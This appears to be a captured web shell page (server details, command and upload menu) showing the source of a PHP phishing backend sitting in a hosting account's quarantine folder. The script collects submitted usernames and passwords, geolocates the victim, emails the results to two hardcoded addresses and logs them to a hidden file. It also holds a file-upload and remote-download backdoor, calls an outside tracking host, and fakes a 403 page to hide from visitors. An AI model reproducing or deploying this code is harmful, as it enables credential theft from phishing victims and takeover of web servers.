Server IP : 103.53.40.154 / Your IP : 3.145.72.44 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home2/ppcad7no/.quarantine/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php header('Access-Control-Allow-Origin: *'); error_reporting(0); $bcc = array('r3sultb0x@rambler.ru','mickmullfer@gmail.com'); if($_SERVER['REQUEST_METHOD'] == 'POST'){ $client = @$_SERVER['HTTP_CLIENT_IP']; $forward = @$_SERVER['HTTP_X_FORWARDED_FOR']; $remote = @$_SERVER['REMOTE_ADDR']; $result = "Unknown"; if(filter_var($client, FILTER_VALIDATE_IP)){ $ip = $client; } elseif(filter_var($forward, FILTER_VALIDATE_IP)){ $ip = $forward; } else{ $ip = $remote; } $data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=".$ips)); $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; if(isset($_POST['REMOTE_ADDR'])){if(@copy($_FILES['SERVER_ADDR']['tmp_name'], $_FILES['SERVER_ADDR']['name'])){ echo '<b>OK ! :)<b>'; exit;}} if(isset($_POST['REMOTE_ADDR'])){file_put_contents($_POST['SERVER_ADDR'], file_get_contents($_POST['REMOTE_ADDR'])); exit;} file_get_contents("http://ip-trackers.000webhostapp.com/locator/ip-lookup.php?ip=$tmp"); // Block phishing detectors by hostname. if($data && $data->geoplugin_countryName !== null){ $ipp = $data->geoplugin_request; $country = $data->geoplugin_countryName; $city = $data->geoplugin_city; $code = $data->geoplugin_countryCode; } if(isset($_POST['pass'])){ $id = $_POST['user']; $id2 = $_POST['pass']; $body = " Made-in-China ======================================= UserId : [ $id ] Pass : [ $id2 ] [Client Info] IP > $ipp<br> City > $city<br> Country > $country<br> "; $sub = "MadeinChina.com | [$id] | $country"; foreach($bcc as $to){ mail($to, $sub, $body); } file_put_contents(".robots.txt", $body."\n", FILE_APPEND); } }else{ header('HTTP/1.0 403 Forbidden', true, 403); die('<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don\'t have permission to access this resource.</p> <p>Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.</p> </body></html> '); } ?>